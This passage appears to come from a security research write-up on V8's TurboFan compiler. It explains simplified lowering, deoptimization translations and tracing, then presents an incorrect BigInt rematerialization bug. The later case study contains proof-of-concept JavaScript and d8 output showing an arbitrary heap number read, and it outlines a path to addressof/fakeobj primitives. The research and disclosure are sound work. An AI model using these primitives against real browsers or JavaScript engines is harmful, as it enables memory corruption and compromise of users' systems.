Let's go through the evolution of a few nodes. The NumberConstant #29 will be replaced by the Int32Constant #41. Indeed, the output of the NumberConstant #29 has a kRepTaggedSigned representation. However, because it is used as its first input, the Return node wants it truncated to word32. Therefore, the node will get converted. This is done by the ConvertInput function, which itself calls the representation changer via the function GetRepresentationFor. Because a truncation to word32 is requested, execution is redirected to RepresentationChanger::GetWord32RepresentationFor, which then calls MakeTruncatedInt32Constant.

Node* RepresentationChanger::MakeTruncatedInt32Constant(double value) {
  return jsgraph()->Int32Constant(DoubleToInt32(value));
}
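
DoubleToInt32 follows the ECMAScript ToInt32 semantics: truncate toward zero, take the value modulo 2**32 and reinterpret it as a signed 32-bit integer. In Python (ignoring NaN/infinity handling for brevity):

def double_to_int32(value):
    n = int(value) & 0xffffffff          # truncate, then modulo 2**32
    return n - 0x100000000 if n >= 0x80000000 else n

print(double_to_int32(-1.5))             # -1
print(double_to_int32(4294967296.0))     # 0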

visit #30: Return
  change: #30:Return(@0 #29:NumberConstant)  from kRepTaggedSigned to kRepWord32:truncate-to-word32

For the second input of the Return node, the use information indicates a tagged representation and no truncation. However, the second input (SpeculativeNumberModulus #28) has a kRepWord32 output representation. Again, they don't match, and when ConvertInput is called the representation changer will be used. This time, the function used is RepresentationChanger::GetTaggedRepresentationFor. If the type of the input (node #28) is a Signed31, then TurboFan knows it can use a ChangeInt31ToTaggedSigned operator to make the conversion. This is the case here because the type computed for node 28 is Range(0,4).

// ...
    else if (IsWord(output_rep)) {
    if (output_type.Is(Type::Signed31())) {
      op = simplified()->ChangeInt31ToTaggedSigned();
    }

visit #30: Return
  change: #30:Return(@1 #28:SpeculativeNumberModulus)  from kRepWord32 to kRepTagged:no-truncation (but distinguish zeros)

The last example we'll go through is the case of the SpeculativeNumberModulus node itself.

 visit #28: SpeculativeNumberModulus
  change: #28:SpeculativeNumberModulus(@0 #24:NumberConstant)  from kRepTaggedSigned to kRepWord32:truncate-to-word32
// (comment) from #24:NumberConstant to #44:Int32Constant
defer replacement #28:SpeculativeNumberModulus with #60:Phi

If we compare the graph (well, a subset), we can observe:

  • the insertion of the ChangeInt31ToTaggedSigned (#42), in the blue rectangle
  • the original inputs of node #28, before simplified lowering, are still there but attached to other nodes (orange rectangle)
  • node #28 has been replaced by the phi node #60 ... but it also leads to the creation of all the other nodes in the orange rectangle

This is before simplified lowering:

This is after:

The creation of all the nodes inside the green rectangle is done by SimplifiedLowering::Uint32Mod which is called by the SpeculativeNumberModulus visitor.

  void VisitSpeculativeNumberModulus(Node* node, Truncation truncation,
                                     SimplifiedLowering* lowering) {
    if (BothInputsAre(node, Type::Unsigned32OrMinusZeroOrNaN()) &&
        (truncation.IsUsedAsWord32() ||
         NodeProperties::GetType(node).Is(Type::Unsigned32()))) {
      // => unsigned Uint32Mod
      VisitWord32TruncatingBinop(node);
      if (lower()) DeferReplacement(node, lowering->Uint32Mod(node));
      return;
    }
    // ...
  }

Node* SimplifiedLowering::Uint32Mod(Node* const node) {
  Uint32BinopMatcher m(node);
  Node* const minus_one = jsgraph()->Int32Constant(-1);
  Node* const zero = jsgraph()->Uint32Constant(0);
  Node* const lhs = m.left().node();
  Node* const rhs = m.right().node();

  if (m.right().Is(0)) {
    return zero;
  } else if (m.right().HasValue()) {
    return graph()->NewNode(machine()->Uint32Mod(), lhs, rhs, graph()->start());
  }

  // General case for unsigned integer modulus, with optimization for (unknown)
  // power of 2 right hand side.
  //
  //   if rhs == 0 then
  //     zero
  //   else
  //     msk = rhs - 1
  //     if rhs & msk != 0 then
  //       lhs % rhs
  //     else
  //       lhs & msk
  //
  // Note: We do not use the Diamond helper class here, because it really hurts
  // readability with nested diamonds.
  const Operator* const merge_op = common()->Merge(2);
  const Operator* const phi_op =
      common()->Phi(MachineRepresentation::kWord32, 2);

  Node* check0 = graph()->NewNode(machine()->Word32Equal(), rhs, zero);
  Node* branch0 = graph()->NewNode(common()->Branch(BranchHint::kFalse), check0,
                                   graph()->start());

  Node* if_true0 = graph()->NewNode(common()->IfTrue(), branch0);
  Node* true0 = zero;

  Node* if_false0 = graph()->NewNode(common()->IfFalse(), branch0);
  Node* false0;
  {
    Node* msk = graph()->NewNode(machine()->Int32Add(), rhs, minus_one);

    Node* check1 = graph()->NewNode(machine()->Word32And(), rhs, msk);
    Node* branch1 = graph()->NewNode(common()->Branch(), check1, if_false0);

    Node* if_true1 = graph()->NewNode(common()->IfTrue(), branch1);
    Node* true1 = graph()->NewNode(machine()->Uint32Mod(), lhs, rhs, if_true1);

    Node* if_false1 = graph()->NewNode(common()->IfFalse(), branch1);
    Node* false1 = graph()->NewNode(machine()->Word32And(), lhs, msk);

    if_false0 = graph()->NewNode(merge_op, if_true1, if_false1);
    false0 = graph()->NewNode(phi_op, true1, false1, if_false0);
  }

  Node* merge0 = graph()->NewNode(merge_op, if_true0, if_false0);
  return graph()->NewNode(phi_op, true0, false0, merge0);
}
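
Stripped of the graph plumbing, the logic built by Uint32Mod is just the following (a direct Python transcription of the pseudocode in the comment above):

def uint32_mod(lhs, rhs):
    if rhs == 0:
        return 0
    msk = rhs - 1
    if rhs & msk:            # rhs is not a power of two
        return lhs % rhs
    return lhs & msk         # rhs is a power of two: modulus becomes a mask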

A high level overview of deoptimization

Understanding deoptimization requires studying several components of V8:

  • instruction selection
    • when descriptors for FrameState and StateValues nodes are built
  • code generation
    • when deoptimization input data are built (that includes a Translation)
  • the deoptimizer
    • at runtime, this is where execution is redirected to when "bailing out to deoptimization"
    • uses the Translation
    • translates from the current input frame (optimized native code) to the output interpreted frame (interpreted ignition bytecode)

When looking at the sea of nodes in Turbolizer, you may see different kinds of nodes related to deoptimization, such as:

  • Checkpoint
    • refers to a FrameState
  • FrameState
    • refers to a position and a state, takes StateValues as inputs
  • StateValues
    • state of parameters, local variables, accumulator
  • Deoptimize / DeoptimizeIf / DeoptimizeUnless etc

There are several types of deoptimization:

  • eager, when you deoptimize the current function on the spot
    • you just triggered a type guard (ex: wrong map, thanks to a CheckMaps node)
  • lazy, you deoptimize later
    • another function just violated a code dependency (ex: a function call just made a map unstable, violating a stable map dependency)
  • soft
    • a function got optimized too early, more feedback is needed

We are only discussing the case where optimized assembly code deoptimizes back to ignition interpreted bytecode, that is, the constructed output frame is an interpreted frame. However, there are other kinds of frames we are not going to discuss in this article (ex: adaptor frames, builtin continuation frames, etc). Michael Stanton, a V8 dev, wrote a few interesting blog posts you may want to check.

We know that javascript first gets translated to ignition bytecode (and a feedback vector is associated to that bytecode). Then, TurboFan might kick in and generate optimized code based on speculations (using the aforementioned feedback vector). It associates deoptimization input data to this optimized code. When executing optimized code, if an assumption is violated (let's say, a type guard for instance), the flow of execution gets redirected to the deoptimizer. The deoptimizer takes those deoptimization input data to translate the current input frame and compute an output frame. The deoptimization input data tell the deoptimizer what kind of deoptimization is to be done (for instance, are we going back to some standard ignition bytecode? That implies building an interpreted frame as an output frame). They also indicate where to deoptimize to (such as the bytecode offset), what values to put in the output frame and how to translate them. Finally, once everything is ready, it returns to the ignition interpreter.

During code generation, for every instruction that has a flag indicating a possible deoptimization, a branch is generated. It either branches to a continuation block (normal execution) or to a deoptimization exit to which is attached a Translation.

To build the translation, code generation uses information from structures such as a FrameStateDescriptor and a list of StateValueDescriptor. They obviously correspond to FrameState and StateValues nodes. Those structures are built during instruction selection, not when visiting those nodes (no code generation is directly associated to those nodes, therefore they don't have associated visitors in the instruction selector).

Tracing a deoptimization

Let's go through a quick experiment using the following script.

function add_prop(x) {
  let obj = {};
  obj[x] = 42;
}

add_prop("x");
%PrepareFunctionForOptimization(add_prop);
add_prop("x");
add_prop("x");
add_prop("x");
%OptimizeFunctionOnNextCall(add_prop);
add_prop("x");
add_prop("different");

Now run it using --turbo-profiling and --print-code-verbose.

This allows us to dump the deoptimization input data:

Deoptimization Input Data (deopt points = 5)
 index  bytecode-offset    pc  commands
     0                0   269  BEGIN {frame count=1, js frame count=1, update_feedback_count=0}
                               INTERPRETED_FRAME {bytecode_offset=0, function=0x3ee5e83df701 <String[#8]: add_prop>, height=1, retval=@0(#0)}
                               STACK_SLOT {input=3}
                               STACK_SLOT {input=-2}
                               STACK_SLOT {input=-1}
                               STACK_SLOT {input=4}
                               LITERAL {literal_id=2 (0x3ee5f5180df9 <Odd Oddball: optimized_out>)}
                               LITERAL {literal_id=2 (0x3ee5f5180df9 <Odd Oddball: optimized_out>)}

// ...

     4                6    NA  BEGIN {frame count=1, js frame count=1, update_feedback_count=0}
                               INTERPRETED_FRAME {bytecode_offset=6, function=0x3ee5e83df701 <String[#8]: add_prop>, height=1, retval=@0(#0)}
                               STACK_SLOT {input=3}
                               STACK_SLOT {input=-2}
                               REGISTER {input=rcx}
                               STACK_SLOT {input=4}
                               CAPTURED_OBJECT {length=7}
                               LITERAL {literal_id=3 (0x3ee5301c0439 <Map(HOLEY_ELEMENTS)>)}
                               LITERAL {literal_id=4 (0x3ee5f5180c01 <FixedArray[0]>)}
                               LITERAL {literal_id=4 (0x3ee5f5180c01 <FixedArray[0]>)}
                               LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
                               LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
                               LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
                               LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
                               LITERAL {literal_id=6 (42)}

And we also see the code used to bail out to deoptimization (notice that the deopt index matches the index of a translation in the deoptimization input data).

// trimmed / simplified output
nop
REX.W movq r13,0x0       ;; debug: deopt position, script offset '17'
                         ;; debug: deopt position, inlining id '-1'
                         ;; debug: deopt reason '(unknown)'
                         ;; debug: deopt index 0
call 0x55807c02040       ;; lazy deoptimization bailout
// ...
REX.W movq r13,0x4       ;; debug: deopt position, script offset '44'
                         ;; debug: deopt position, inlining id '-1'
                         ;; debug: deopt reason 'wrong name'
                         ;; debug: deopt index 4
call 0x55807bc2040       ;; eager deoptimization bailout
nop

Interestingly (you'll need to also add the --code-comments flag), we can notice that a native TurboFan-compiled function starts with a check for any required lazy deoptimization!

                  -- Prologue: check for deoptimization --
0x1332e5442b44    24  488b59e0       REX.W movq rbx,[rcx-0x20]
0x1332e5442b48    28  f6430f01       testb [rbx+0xf],0x1
0x1332e5442b4c    2c  740d           jz 0x1332e5442b5b  <+0x3b>
                  -- Inlined Trampoline to CompileLazyDeoptimizedCode --
0x1332e5442b4e    2e  49ba6096371501000000 REX.W movq r10,0x115379660  (CompileLazyDeoptimizedCode)    ;; off heap target
0x1332e5442b58    38  41ffe2         jmp r10

Now let's trace the actual deoptimization with --trace-deopt. We can see the deoptimization reason: wrong name. Because the feedback indicates that we always add a property named "x", TurboFan speculates it will always be the case. Thus, executing the optimized code with any different name violates this assumption and triggers a deoptimization.

[deoptimizing (DEOPT eager): begin 0x0a6842edfa99 <JSFunction add_prop (sfi = 0xa6842edf881)> (opt #0) @2, FP to SP delta: 24, caller sp: 0x7ffeeb82e3b0]
            ;;; deoptimize at <test.js:3:8>, wrong name

It displays the input frame.

  reading input frame add_prop => bytecode_offset=6, args=2, height=1, retval=0(#0); inputs:
      0: 0x0a6842edfa99 ;  [fp -  16]  0x0a6842edfa99 <JSFunction add_prop (sfi = 0xa6842edf881)>
      1: 0x0a6876381579 ;  [fp +  24]  0x0a6876381579 <JSGlobal Object>
      2: 0x0a6842edf7a9 ; rdx 0x0a6842edf7a9 <String[#9]: different>
      3: 0x0a6842ec1831 ;  [fp -  24]  0x0a6842ec1831 <NativeContext[244]>
      4: captured object #0 (length = 7)
           0x0a68d4640439 ; (literal  3) 0x0a68d4640439 <Map(HOLEY_ELEMENTS)>
           0x0a6893080c01 ; (literal  4) 0x0a6893080c01 <FixedArray[0]>
           0x0a6893080c01 ; (literal  4) 0x0a6893080c01 <FixedArray[0]>
           0x0a68930804b1 ; (literal  5) 0x0a68930804b1 <undefined>
           0x0a68930804b1 ; (literal  5) 0x0a68930804b1 <undefined>
           0x0a68930804b1 ; (literal  5) 0x0a68930804b1 <undefined>
           0x0a68930804b1 ; (literal  5) 0x0a68930804b1 <undefined>
      5: 0x002a00000000 ; (literal  6) 42

The deoptimizer uses the translation at index 2 of deoptimization data.

     2                6    NA  BEGIN {frame count=1, js frame count=1, update_feedback_count=0}
                               INTERPRETED_FRAME {bytecode_offset=6, function=0x3ee5e83df701 <String[#8]: add_prop>, height=1, retval=@0(#0)}
                               STACK_SLOT {input=3}
                               STACK_SLOT {input=-2}
                               REGISTER {input=rdx}
                               STACK_SLOT {input=4}
                               CAPTURED_OBJECT {length=7}
                               LITERAL {literal_id=3 (0x3ee5301c0439 <Map(HOLEY_ELEMENTS)>)}
                               LITERAL {literal_id=4 (0x3ee5f5180c01 <FixedArray[0]>)}
                               LITERAL {literal_id=4 (0x3ee5f5180c01 <FixedArray[0]>)}
                               LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
                               LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
                               LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
                               LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
                               LITERAL {literal_id=6 (42)}

And displays the translated interpreted frame.

  translating interpreted frame add_prop => bytecode_offset=6, variable_frame_size=16, frame_size=80
    0x7ffeeb82e3a8: [top +  72] <- 0x0a6876381579 <JSGlobal Object> ;  stack parameter (input #1)
    0x7ffeeb82e3a0: [top +  64] <- 0x0a6842edf7a9 <String[#9]: different> ;  stack parameter (input #2)
    -------------------------
    0x7ffeeb82e398: [top +  56] <- 0x000105d9e4d2 ;  caller's pc
    0x7ffeeb82e390: [top +  48] <- 0x7ffeeb82e3f0 ;  caller's fp
    0x7ffeeb82e388: [top +  40] <- 0x0a6842ec1831 <NativeContext[244]> ;  context (input #3)
    0x7ffeeb82e380: [top +  32] <- 0x0a6842edfa99 <JSFunction add_prop (sfi = 0xa6842edf881)> ;  function (input #0)
    0x7ffeeb82e378: [top +  24] <- 0x0a6842edfbd1 <BytecodeArray[12]> ;  bytecode array
    0x7ffeeb82e370: [top +  16] <- 0x003b00000000 <Smi 59> ;  bytecode offset
    -------------------------
    0x7ffeeb82e368: [top +   8] <- 0x0a6893080c11 <Odd Oddball: arguments_marker> ;  stack parameter (input #4)
    0x7ffeeb82e360: [top +   0] <- 0x002a00000000 <Smi 42> ;  accumulator (input #5)

After that, it is ready to redirect the execution to the ignition interpreter.

[deoptimizing (eager): end 0x0a6842edfa99 <JSFunction add_prop (sfi = 0xa6842edf881)> @2 => node=6, pc=0x000105d9e9a0, caller sp=0x7ffeeb82e3b0, took 2.698 ms]
Materialization [0x7ffeeb82e368] <- 0x0a6842ee0031 ;  0x0a6842ee0031 <Object map = 0xa68d4640439>

Case study: an incorrect BigInt rematerialization

Back to simplified lowering

Let's have a look at the way FrameState nodes are dealt with during the simplified lowering phase.

FrameState nodes expect 6 inputs:

  1. parameters
    • UseInfo is AnyTagged
  2. registers
    • UseInfo is AnyTagged
  3. the accumulator
    • UseInfo is Any
  4. a context
    • UseInfo is AnyTagged
  5. a closure
    • UseInfo is AnyTagged
  6. the outer frame state
    • UseInfo is AnyTagged

A FrameState has a tagged output representation.

  void VisitFrameState(Node* node) {
    DCHECK_EQ(5, node->op()->ValueInputCount());
    DCHECK_EQ(1, OperatorProperties::GetFrameStateInputCount(node->op()));

    ProcessInput(node, 0, UseInfo::AnyTagged());  // Parameters.
    ProcessInput(node, 1, UseInfo::AnyTagged());  // Registers.

    // Accumulator is a special flower - we need to remember its type in
    // a singleton typed-state-values node (as if it was a singleton
    // state-values node).
    if (propagate()) {
      EnqueueInput(node, 2, UseInfo::Any());
    } else if (lower()) {
      Zone* zone = jsgraph_->zone();
      Node* accumulator = node->InputAt(2);
      if (accumulator == jsgraph_->OptimizedOutConstant()) {
        node->ReplaceInput(2, jsgraph_->SingleDeadTypedStateValues());
      } else {
        ZoneVector<MachineType>* types =
            new (zone->New(sizeof(ZoneVector<MachineType>)))
                ZoneVector<MachineType>(1, zone);
        (*types)[0] = DeoptMachineTypeOf(GetInfo(accumulator)->representation(),
                                         TypeOf(accumulator));

        node->ReplaceInput(
            2, jsgraph_->graph()->NewNode(jsgraph_->common()->TypedStateValues(
                                              types, SparseInputMask::Dense()),
                                          accumulator));
      }
    }

    ProcessInput(node, 3, UseInfo::AnyTagged());  // Context.
    ProcessInput(node, 4, UseInfo::AnyTagged());  // Closure.
    ProcessInput(node, 5, UseInfo::AnyTagged());  // Outer frame state.
    return SetOutput(node, MachineRepresentation::kTagged);
  }

An input node for which the use info is AnyTagged means this input is being used as a tagged value and that the truncation kind is any, i.e. no truncation is required (although it may be required to distinguish between zeros).

An input node for which the use info is Any means the input is being used as any kind of value and that the truncation kind is any. No truncation is needed. The input representation is undetermined. That is the most generic case.

// The {UseInfo} class is used to describe a use of an input of a node. 

  static UseInfo AnyTagged() {
    return UseInfo(MachineRepresentation::kTagged, Truncation::Any());
  }
  // Undetermined representation.
  static UseInfo Any() {
    return UseInfo(MachineRepresentation::kNone, Truncation::Any());
  }
  // Value not used.
  static UseInfo None() {
    return UseInfo(MachineRepresentation::kNone, Truncation::None());
  }
const char* Truncation::description() const {
  switch (kind()) {
    case TruncationKind::kNone:
      return "no-value-use";
    // ...
    case TruncationKind::kAny:
      switch (identify_zeros()) {
        case kIdentifyZeros:
          return "no-truncation (but identify zeros)";
        case kDistinguishZeros:
          return "no-truncation (but distinguish zeros)";
      }
  }
  // ...
}

If we trace the first phase of simplified lowering (truncation propagation), we get the following output:

 visit #46: FrameState (trunc: no-truncation (but distinguish zeros))
   queue #7?: no-truncation (but distinguish zeros)
  initial #45: no-truncation (but distinguish zeros)
   queue #71?: no-truncation (but distinguish zeros)
   queue #4?: no-truncation (but distinguish zeros)
   queue #62?: no-truncation (but distinguish zeros)
   queue #0?: no-truncation (but distinguish zeros)

All the inputs are added to the queue, no truncation is ever propagated. The node #71 corresponds to the accumulator since it is the 3rd input.

 visit #71: BigIntAsUintN (trunc: no-truncation (but distinguish zeros))
   queue #70?: no-value-use

In our example, the accumulator input is a BigIntAsUintN node. Such a node consumes an input used as a word64, truncated to word64.

The astute reader will wonder what happens if this node returns a number that requires more than 64 bits. The answer lies in the inlining phase. Indeed, a JSCall to the BigInt.asUintN builtin will be reduced to a BigIntAsUintN TurboFan operator only in the case where TurboFan is guaranteed that the requested width is 64 bits at most.

This node outputs a word64 and has BigInt as a restriction type. During the type propagation phase, any type computed for a given node will be intersected with its restriction type.

      case IrOpcode::kBigIntAsUintN: {
        ProcessInput(node, 0, UseInfo::TruncatingWord64());
        SetOutput(node, MachineRepresentation::kWord64, Type::BigInt());
        return;
      }

So at this point (after the propagation phase and before the lowering phase), if we focus on the FrameState node and its accumulator input (the 3rd input, index 2), we can say the following:

  • the FrameState's accumulator input expects MachineRepresentation::kNone (which includes everything, especially kWord64)
  • the FrameState doesn't truncate its accumulator input
  • the BigIntAsUintN output representation is kWord64

Because input 2 is used as Any (with a kNone representation), there won't ever be any conversion of the input node:

  // Converts input {index} of {node} according to given UseInfo {use},
  // assuming the type of the input is {input_type}. If {input_type} is null,
  // it takes the input from the input node {TypeOf(node->InputAt(index))}.
  void ConvertInput(Node* node, int index, UseInfo use,
                    Type input_type = Type::Invalid()) {
    Node* input = node->InputAt(index);
    // In the change phase, insert a change before the use if necessary.
    if (use.representation() == MachineRepresentation::kNone)
      return;  // No input requirement on the use.

So what happens during the last phase of simplified lowering (the phase that lowers nodes and adds conversions)? If we look at the visitor of FrameState nodes, we can see that eventually the accumulator input may get replaced by a TypedStateValues node. The BigIntAsUintN node is now the input of the TypedStateValues node. No conversion of any kind is ever done.

  ZoneVector<MachineType>* types =
      new (zone->New(sizeof(ZoneVector<MachineType>)))
          ZoneVector<MachineType>(1, zone);
  (*types)[0] = DeoptMachineTypeOf(GetInfo(accumulator)->representation(),
                                   TypeOf(accumulator));

  node->ReplaceInput(
      2, jsgraph_->graph()->NewNode(jsgraph_->common()->TypedStateValues(
                                        types, SparseInputMask::Dense()),
                                    accumulator));

Also, the vector of MachineType is associated with the TypedStateValues node. To compute the machine type, DeoptMachineTypeOf relies on the node's type.

In that case (a BigIntAsUintN node), the type will be Type::BigInt().

Type OperationTyper::BigIntAsUintN(Type type) {
  DCHECK(type.Is(Type::BigInt()));
  return Type::BigInt();
}

As we just saw, because for this node the output representation is kWord64 and the type is BigInt, the MachineType is MachineType::AnyTagged.

  static MachineType DeoptMachineTypeOf(MachineRepresentation rep, Type type) {
    // ..
    if (rep == MachineRepresentation::kWord64) {
      if (type.Is(Type::BigInt())) {
        return MachineType::AnyTagged();
      }
// ...
  }

So if we look at the sea of nodes right after the escape analysis phase and before the simplified lowering phase, it looks like this:

And after the simplified lowering phase, we can confirm that a TypedStateValues node was indeed inserted.

After effect control linearization, the BigIntAsUintN node gets lowered to a Word64And node.
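
Concretely, for the 49-bit truncation used in the PoCs below, the lowered operation amounts to a bitwise AND with a 49-bit mask; in plain JavaScript terms (an illustration of the semantics, not engine code):

// What the lowered Word64And computes for BigInt.asUintN(49, v):
const mask = (1n << 49n) - 1n; // 0x1ffffffffffff
const v = 0x11111111n;
console.log((v & mask) === BigInt.asUintN(49, v)); // true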

As we learned earlier, the FrameState and TypedStateValues nodes do not directly correspond to any code generation.

void InstructionSelector::VisitNode(Node* node) {
  switch (node->opcode()) {
  // ...
    case IrOpcode::kFrameState:
    case IrOpcode::kStateValues:
    case IrOpcode::kObjectState:
      return;
  // ...

However, other nodes may make use of FrameState and TypedStateValues nodes. This is the case, for instance, of the various Deoptimize nodes and also of Call nodes.

They will make the instruction selector build the necessary FrameStateDescriptor and StateValueList of StateValueDescriptor.

Using those structures, the code generator will then build the necessary DeoptimizationExits to which a Translation will be associated. The function BuildTranslation handles the InstructionOperands in CodeGenerator::AddTranslationForOperand. And this is where the (AnyTagged) MachineType corresponding to the BigIntAsUintN node is used! When building the translation, the BigInt value is used as if it were a pointer (second branch) and not a double value (first branch)!

void CodeGenerator::AddTranslationForOperand(Translation* translation,
                                             Instruction* instr,
                                             InstructionOperand* op,
                                             MachineType type) {
  // ...
      case Constant::kInt64:
        DCHECK_EQ(8, kSystemPointerSize);
        if (type.representation() == MachineRepresentation::kWord64) {
          literal =
              DeoptimizationLiteral(static_cast<double>(constant.ToInt64()));
        } else {
          // When pointers are 8 bytes, we can use int64 constants to represent
          // Smis.
          DCHECK_EQ(MachineRepresentation::kTagged, type.representation());
          Smi smi(static_cast<Address>(constant.ToInt64()));
          DCHECK(smi.IsSmi());
          literal = DeoptimizationLiteral(smi.value());
        }
        break;
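
To make the second branch concrete: on x64 (without pointer compression), a Smi stores its payload in the upper 32 bits of the word, so smi.value() decodes our controlled 64-bit constant as constant >> 32. The arithmetic below uses the exact value that shows up in the --trace-ignition output later:

// The controlled word from the trace below is 0x004200000000.
// Decoded as a Smi on x64, the payload is the upper 32 bits.
const word = 0x4200000000n;
console.log(word >> 32n); // 66n -> appears as <Smi 66> in the trace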

This is very interesting because it means that at runtime (when deoptimizing), the deoptimizer uses this pointer to rematerialize an object! But since this is a controlled value (the truncated BigInt), we can make the deoptimizer reference an arbitrary object and thus make the next ignition bytecode handler use (or not) this crafted reference.

In this case, we are playing with the accumulator register. Therefore, to find interesting primitives, what we need to do is to look for all the bytecode handlers that get the accumulator (using a GetAccumulator for instance).

Experiment 1 - reading an arbitrary heap number

The most obvious primitive is the one we get by deoptimizing to the ignition handler for add opcodes.

let addr = BigInt(0x11111111);

function setAddress(val) {
  addr = BigInt(val);
}

function f(x) {
  let y = BigInt.asUintN(49, addr);
  let a = 111;
  try {
    var res = 1.1 + y; // will trigger a deoptimization. reason : "Insufficient type feedback for binary operation"
    return res;
  }
  catch(_){ return y}
}

function compileOnce() {
  f({x:1.1});
  %PrepareFunctionForOptimization(f);
  f({x:1.1});
  %OptimizeFunctionOnNextCall(f);
  return f({x:1.1});
}

When reading the implementation of the handler (BinaryOpAssembler::Generate_AddWithFeedback in src/ic/binary-op-assembler.cc), we observe that for heap number additions, the code ends up calling the function LoadHeapNumberValue. In that case, it gets called with an arbitrary pointer.

To demonstrate the bug, we use the %DebugPrint runtime function to get the address of an object (simulating an infoleak primitive) and see that we indeed (incorrectly) read its value.

d8> var a = new Number(3.14); %DebugPrint(a)
0x025f585caa49 <Number map = 000000FB210820A1 value = 0x019d1cb1f631 <HeapNumber 3.14>>
3.14
d8> setAddress(0x025f585caa49)
undefined
d8> compileOnce()
4.24

We can get the same primitive using other kinds of ignition bytecode handlers such as +, -, /, * or %.

--- var res = 1.1 + y;
+++ var res = y / 1;
d8> var a = new Number(3.14); %DebugPrint(a)
0x019ca5a8aa11 <Number map = 00000138F15420A1 value = 0x0168e8ddf611 <HeapNumber 3.14>>
3.14
d8> setAddress(0x019ca5a8aa11)
undefined
d8> compileOnce()
3.14

The --trace-ignition debugging utility can be useful in this scenario. For instance, let's say we use a BigInt value of 0x4200000000 and, instead of doing 1.1 + y, we do y / 1. We can then trace the execution and confirm the behaviour we expect.

The trace tells us:

  • a deoptimization was triggered and why (insufficient type feedback for binary operation, this binary operation being the division)
  • in the input frame, there is a register entry containing the BigInt value thanks to (or because of) the incorrect lowering: 11: 0x004200000000 ; rcx 66
  • in the translated interpreted frame, the accumulator gets the value 0x004200000000 (<Smi 66>)
  • we deoptimize directly to offset 39, which corresponds to DivSmi [1], [6]

[deoptimizing (DEOPT soft): begin 0x01b141c5f5f1 <JSFunction f (sfi = 000001B141C5F299)> (opt #0) @3, FP to SP delta: 40, caller sp: 0x0042f87fde08]
            ;;; deoptimize at <read_heap_number.js:11:17>, Insufficient type feedback for binary operation
  reading input frame f => bytecode_offset=39, args=2, height=8, retval=0(#0); inputs:
      0: 0x01b141c5f5f1 ;  [fp -  16]  0x01b141c5f5f1 <JSFunction f (sfi = 000001B141C5F299)>
      1: 0x03a35e2c1349 ;  [fp +  24]  0x03a35e2c1349 <JSGlobal Object>
      2: 0x03a35e2cb3b1 ;  [fp +  16]  0x03a35e2cb3b1 <Object map = 0000019FAF409DF1>
      3: 0x01b141c5f551 ;  [fp -  24]  0x01b141c5f551 <ScriptContext[5]>
      4: 0x03a35e2cb3d1 ; rdi 0x03a35e2cb3d1 <BigInt 283467841536>
      5: 0x00422b840df1 ; (literal  2) 0x00422b840df1 <Odd Oddball: optimized_out>
      6: 0x00422b840df1 ; (literal  2) 0x00422b840df1 <Odd Oddball: optimized_out>
      7: 0x01b141c5f551 ;  [fp -  24]  0x01b141c5f551 <ScriptContext[5]>
      8: 0x00422b840df1 ; (literal  2) 0x00422b840df1 <Odd Oddball: optimized_out>
      9: 0x00422b840df1 ; (literal  2) 0x00422b840df1 <Odd Oddball: optimized_out>
     10: 0x00422b840df1 ; (literal  2) 0x00422b840df1 <Odd Oddball: optimized_out>
     11: 0x004200000000 ; rcx 66
  translating interpreted frame f => bytecode_offset=39, height=64
    0x0042f87fde00: [top + 120] <- 0x03a35e2c1349 <JSGlobal Object> ;  stack parameter (input #1)
    0x0042f87fddf8: [top + 112] <- 0x03a35e2cb3b1 <Object map = 0000019FAF409DF1> ;  stack parameter (input #2)
    -------------------------
    0x0042f87fddf0: [top + 104] <- 0x7ffd93f64c1d ;  caller's pc
    0x0042f87fdde8: [top +  96] <- 0x0042f87fde38 ;  caller's fp
    0x0042f87fdde0: [top +  88] <- 0x01b141c5f551 <ScriptContext[5]> ;  context (input #3)
    0x0042f87fddd8: [top +  80] <- 0x01b141c5f5f1 <JSFunction f (sfi = 000001B141C5F299)> ;  function (input #0)
    0x0042f87fddd0: [top +  72] <- 0x01b141c5fa41 <BytecodeArray[61]> ;  bytecode array
    0x0042f87fddc8: [top +  64] <- 0x005c00000000 <Smi 92> ;  bytecode offset
    -------------------------
    0x0042f87fddc0: [top +  56] <- 0x03a35e2cb3d1 <BigInt 283467841536> ;  stack parameter (input #4)
    0x0042f87fddb8: [top +  48] <- 0x00422b840df1 <Odd Oddball: optimized_out> ;  stack parameter (input #5)
    0x0042f87fddb0: [top +  40] <- 0x00422b840df1 <Odd Oddball: optimized_out> ;  stack parameter (input #6)
    0x0042f87fdda8: [top +  32] <- 0x01b141c5f551 <ScriptContext[5]> ;  stack parameter (input #7)
    0x0042f87fdda0: [top +  24] <- 0x00422b840df1 <Odd Oddball: optimized_out> ;  stack parameter (input #8)
    0x0042f87fdd98: [top +  16] <- 0x00422b840df1 <Odd Oddball: optimized_out> ;  stack parameter (input #9)
    0x0042f87fdd90: [top +   8] <- 0x00422b840df1 <Odd Oddball: optimized_out> ;  stack parameter (input #10)
    0x0042f87fdd88: [top +   0] <- 0x004200000000 <Smi 66> ;  accumulator (input #11)
[deoptimizing (soft): end 0x01b141c5f5f1 <JSFunction f (sfi = 000001B141C5F299)> @3 => node=39, pc=0x7ffd93f65100, caller sp=0x0042f87fde08, took 2.328 ms]
 -> 000001B141C5FA9D @   39 : 43 01 06          DivSmi [1], [6]
      [ accumulator -> 66 ]
      [ accumulator <- 66 ]
 -> 000001B141C5FAA0 @   42 : 26 f9             Star r2
      [ accumulator -> 66 ]
      [          r2 <- 66 ]
 -> 000001B141C5FAA2 @   44 : a9                Return 
      [ accumulator -> 66 ]

Experiment 2 - getting an arbitrary object reference

This bug also gives a better, more powerful primitive. Indeed, if instead of deoptimizing back to an add handler we deoptimize to Builtins_StaKeyedPropertyHandler, we'll be able to store an arbitrary object reference in an object property. Therefore, if an attacker is also able to leverage an infoleak primitive, they would be able to craft any arbitrary object (these are sometimes referred to as the addressof and fakeobj primitives).

In order to deoptimize to this specific handler, aka deoptimize on obj[x] = y, we have to make this line do something that violates a speculation. If we repeatedly call the function f with the same property name, TurboFan will speculate that we're always gonna add the same property. Once the code is optimized, using a property with a different name will violate this assumption, call the deoptimizer and then redirect execution to the StaKeyedProperty handler.

